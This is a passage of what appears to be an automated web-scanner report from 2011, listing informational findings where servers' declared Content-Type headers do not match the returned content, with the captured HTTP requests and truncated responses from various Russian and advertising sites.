document.write('<a href="http://foreign.dt00.net/click.php?id=308&amp;zone=1&amp;country=4" target="_blank"><img src="http://img.dt00.net/foreign/166.gif" alt=".................." border="0" /></a><i
...[SNIP]...

33.15. http://foreign.dt00.net/zones/zone23.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://foreign.dt00.net
Path:   /zones/zone23.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /zones/zone23.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:32:50 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 502


document.write('<ul class="hmenu-1 clearfix hmactive-5 mt"><li class="tm-5"><span>......................</span></li></ul> <div class="l-block">');document.write('<a href="http://foreign.dt00.net/cli
...[SNIP]...

33.16. http://foreign.dt00.net/zones/zone25.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://foreign.dt00.net
Path:   /zones/zone25.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /zones/zone25.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/doping.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:03 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 644


document.write('<div style="height:90px;overflow:hidden;background:url(http://img.dt00.net/images/banners/ap-banner-bg.png) no-repeat;"><a href="http://usr.marketgid.com/demo/popunder/" target="_blan
...[SNIP]...

33.17. http://foreign.dt00.net/zones/zone40.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://foreign.dt00.net
Path:   /zones/zone40.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /zones/zone40.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/right_premium.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:03 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 536


document.write('<style type="text/css"> @import "http://oth.dt00.net/css/global/global.css"; </style> <ul class="box-title cr-5"><li class="cr-5"><span>..............</span></li></ul> <div class=
...[SNIP]...

33.18. http://games.webalta.ru/public/css/style-games.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://games.webalta.ru
Path:   /public/css/style-games.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/css/style-games.css HTTP/1.1
Host: games.webalta.ru
Proxy-Connection: keep-alive
Referer: http://games.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:22:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 22 Dec 2010 12:50:51 GMT
ETag: "e100b5-16b4-497ff33f520c0"
Accept-Ranges: bytes
Content-Length: 5812
Connection: close
Content-Type: text/css

body {padding:0; margin:0 3px 10px; background-color:#FFF;}
body, a, div, td {font:normal 12px Tahoma; color:#666;}

a, a:hover {text-decoration:none;}
a:hover {text-decoration:underline;}

.link-01 {
...[SNIP]...

33.19. http://goods.adnectar.com/analytics/get_avia_js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://goods.adnectar.com
Path:   /analytics/get_avia_js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /analytics/get_avia_js?api_version=3.0.0&site_key=a9aa425c93ef5dff380c&avia_version=0.8.16 HTTP/1.1
Host: goods.adnectar.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Status: 200
ETag: "643abe138f06b030650a5c28ca19bdb4"
X-Runtime: 1
Content-Length: 6324
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: adnectar_id=PObkQ021hYBNKXjmCLweAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"

var exceptionmessage = null;
try {
var avia_already_defined = false;
if (typeof(_an_tracker) !== 'undefined') {
avia_already_defined = true;
}

// First, define JS versions of methods not
...[SNIP]...

33.20. https://hourly.deploy.com/images/logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://hourly.deploy.com
Path:   /images/logo.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/logo.jpg HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=d83017703d58414f6c12

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:31 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Tue, 04 Aug 2009 06:26:33 GMT
ETag: "60426b-140e-f7bb9840"
Accept-Ranges: bytes
Content-Length: 5134
Cache-Control: max-age=86400
Expires: Tue, 26 Apr 2011 13:39:31 GMT
Connection: close
Content-Type: image/jpeg

GIF89a..9...........H9.SE.`SZXY...fef.............i`0-....JHI....kb.F9..........RH...............XVW..........H=...=;<.F<.......um.vn.G=..vLIJ................vh...._R.......TE..........I6..."......_U.
...[SNIP]...

33.21. http://img.webalta.ru/public/css/style.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.webalta.ru
Path:   /public/css/style.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/css/style.css HTTP/1.1
Host: img.webalta.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 25 Apr 2011 14:20:00 GMT
Content-Type: text/css
Content-Length: 4614
Last-Modified: Tue, 08 Feb 2011 08:10:02 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Tue, 26 Apr 2011 14:20:00 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

body {padding:0; margin:0 3px 10px; background-color:#FFF;}
body, a, div, td {font:normal 12px Tahoma; color:#666;}

a, a:hover {text-decoration:none;}
a:hover {text-decoration:underline;}

.lin
...[SNIP]...

33.22. http://img.webalta.ru/public/js/webalta.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.webalta.ru
Path:   /public/js/webalta.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/js/webalta.js HTTP/1.1
Host: img.webalta.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 25 Apr 2011 14:20:00 GMT
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 6817
Last-Modified: Mon, 18 Apr 2011 13:24:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Tue, 26 Apr 2011 14:20:00 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

// version 2

function $$(target)
{
   return document.getElementById(target);
}

function newsSetCategory(n)
{
   var i;
   var item;
   var button;
   
   n = n || 0;

   for(i = 0; i < 10; i++)
   
...[SNIP]...

33.23. http://js.dt00.net/public/smi/elastic/24.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://js.dt00.net
Path:   /public/smi/elastic/24.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/smi/elastic/24.js?time=13 HTTP/1.1
Host: js.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:40:23 GMT
Content-Type: application/x-javascript
Content-Length: 12170
Last-Modified: Mon, 25 Apr 2011 14:30:01 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:40:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

var mginformer = '<div class="box"> <ul class="smi-inf" id = "smi-informer"> <li> <a href="http://mgpublications.com/news/37575" target="_blank" class="smi-inf-img"><img width="75" height="75" src="ht
...[SNIP]...

33.24. http://kino.webalta.ru/banners.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://kino.webalta.ru
Path:   /banners.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /banners.xml HTTP/1.1
Host: kino.webalta.ru
Proxy-Connection: keep-alive
Referer: http://kino.webalta.ru/sc/l/banroll.swf?xml_path=/banners.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:20:33 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 3802

<?xml version="1.0" encoding="utf-8"?>
<flash_parameters copyright="anvsoftPFMTheme">
<preferences>
<golbal>
<basic_property movieWidth="620" movieHeight="348" html_title="Title" loadStyle
...[SNIP]...

33.25. http://kino.webalta.ru/sc/l/loach.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://kino.webalta.ru
Path:   /sc/l/loach.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /sc/l/loach.js HTTP/1.1
Host: kino.webalta.ru
Proxy-Connection: keep-alive
Referer: http://kino.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:22:15 GMT
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 14:17:52 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:22:15 GMT
Cache-Control: max-age=86400
Content-Length: 12813

var clip_id;
var channel_id;
var autoplay;
var clip_url = '';
var p_uuid = '';
var sessid = '';
var userid = '';
var username = '';
var notWin = (navigator.userAgent.indexOf('Win') == -1);
var notIE =
...[SNIP]...

33.26. http://l-files.livejournal.net/userapps/10/image  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l-files.livejournal.net
Path:   /userapps/10/image

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a JPEG image.

Request

GET /userapps/10/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 1354355956 1354352273
Via: 1.1 varnish
Age: 251968
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Thu, 03 Feb 2011 11:13:43 GMT
Content-Length: 37341
Connection: keep-alive

......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS5 Macintosh.2011:02:03 11:49:08.........................
...[SNIP]...

33.27. http://l-files.livejournal.net/userapps/2/image  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l-files.livejournal.net
Path:   /userapps/2/image

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /userapps/2/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 795933937 795900092
Via: 1.1 varnish
Age: 165875
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Thu, 03 Feb 2011 11:12:23 GMT
Content-Length: 34106
Connection: keep-alive

.PNG
.
...IHDR...x...x.....9d6....    pHYs................ cHRM..z%..............u0...`..:....o._.F....IDATx...w.e.Y..V.{.X.ruW.nI..V..dI.A...6`0..0..f.C0.30..0.5.f<c<`...s.rR.r...].U...T...^..c..n...
...[SNIP]...

33.28. http://l-files.livejournal.net/userapps/3/image  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l-files.livejournal.net
Path:   /userapps/3/image

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /userapps/3/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 146361845 146338538
Via: 1.1 varnish
Age: 177030
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Wed, 02 Feb 2011 13:36:22 GMT
Content-Length: 7904
Connection: keep-alive

.PNG
.
...IHDR...x...x.............tEXtSoftware.Adobe ImageReadyq.e<....PLTEb3)u....>oK......L..S.t...1.zH..w..V.....L.......h..P.........A..-...\......u$..;..
.....[......m....S.....j.x...ciu.....f
...[SNIP]...

33.29. http://l-files.livejournal.net/userapps/4/image  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l-files.livejournal.net
Path:   /userapps/4/image

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /userapps/4/image?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 1545808843 1545808820
Via: 1.1 varnish
Age: 250126
Date: Mon, 25 Apr 2011 14:31:00 GMT
Last-Modified: Tue, 15 Feb 2011 08:05:38 GMT
Content-Length: 33581
Connection: keep-alive

.PNG
.
...IHDR...x...x.............sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....IDATx^...|TW......$...n..L&..........Z.Xq)R(...X..ii..F....m....|...(mw............k....=
...[SNIP]...

33.30. http://l-files.livejournal.net/userapps/9/image  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l-files.livejournal.net
Path:   /userapps/9/image

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /userapps/9/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain; charset=UTF-8
X-Varnish: 1630994405 1630993912
Via: 1.1 varnish
Age: 177729
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Wed, 02 Feb 2011 13:37:38 GMT
Content-Length: 34553
Connection: keep-alive

.PNG
.
...IHDR...x...x.............IDATx.....\..5z...r.....V..3.B..3...lc{l..=.......l..g.....l.....I(K-.:...............5WR....>..............g5.....Y(.....D.8Q...20.J.t..i...u....6.IB`,..qJ......
...[SNIP]...

33.31. http://l-files.livejournal.net/vgift/445/small  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l-files.livejournal.net
Path:   /vgift/445/small

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /vgift/445/small HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 1355145633 1355145630
Via: 1.1 varnish
Age: 174245
Date: Mon, 25 Apr 2011 14:20:43 GMT
Last-Modified: Fri, 26 Mar 2010 17:52:18 GMT
Content-Length: 18393
Connection: keep-alive

.PNG
.
...IHDR...d...d.....p..T....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..GWIDATx^..ux...6.9gN{
U.P.......\..!....%..wwwwww.!....w....o..m....=.^W......Z...7_|....+.
...[SNIP]...

33.32. http://learn.shavlik.com/shavlik/userCheck.cfm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://learn.shavlik.com
Path:   /shavlik/userCheck.cfm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /shavlik/userCheck.cfm HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.6.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

num0

33.33. http://limg.imgsmail.ru/mail/ru/css/search_top.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://limg.imgsmail.ru
Path:   /mail/ru/css/search_top.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /mail/ru/css/search_top.css?1 HTTP/1.1
Host: limg.imgsmail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:24:54 GMT
Content-Type: text/css
Last-Modified: Fri, 17 Sep 2010 12:08:28 GMT
Connection: keep-alive
Expires: Mon, 02 May 2011 14:24:54 GMT
Cache-Control: max-age=604800
Content-Length: 4085

/* Other */
td.on div div div {padding:0 !important;}
td.on div div {padding: 2px 5px;}
.search_bare {width:99%;}
.search_bare td{vertical-align:middle; color: #FFFFFF;}
.search_bare .inp{width:5
...[SNIP]...

33.34. http://mbox9e.offermatica.com/m2/eset/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mbox9e.offermatica.com
Path:   /m2/eset/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303736347554-914602&mboxPage=1303736347554-914602&mboxCount=1&mbox=mbx_store_con&mboxId=0&mboxTime=1303718347701&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fstore&mboxReferrer=http%3A%2F%2Fwww.eset.com%2Fus%2Fbusiness%2Fproducts&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 168
Date: Mon, 25 Apr 2011 12:58:56 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_store_con',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303736347554-914602.17");

33.35. http://my.webalta.ru/feed/l.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /feed/l.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /feed/l.php?url=&id=80 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:09:20 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.9
Content-Length: 59948

... ...<?xml version="1.0" encoding="utf-8"?><response type="gameboss ver2.0"><result type="games">
<ITEM>
<ID>1093</ID>
<RATE>9999</RATE>
<NAME_URL>vanishing_hitchhiker_rus</NAME_URL>
<TYPE>65</TYP
...[SNIP]...

33.36. http://my.webalta.ru/public/engine/app.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/app.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/app.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:28:52 GMT
Content-Type: application/x-javascript
Content-Length: 27122
Last-Modified: Tue, 23 Dec 2008 15:25:59 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:28:52 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function fNewBlock(block_data)
{
       function fLdrTransfer(data)
       {
           if(!fw.data.isObj(data)) return false;
           var res = fw.io.transfer(this._iohndl, data);
           return true;
       }
       function
...[SNIP]...

33.37. http://my.webalta.ru/public/engine/catalog/general.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/catalog/general.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/catalog/general.txt HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
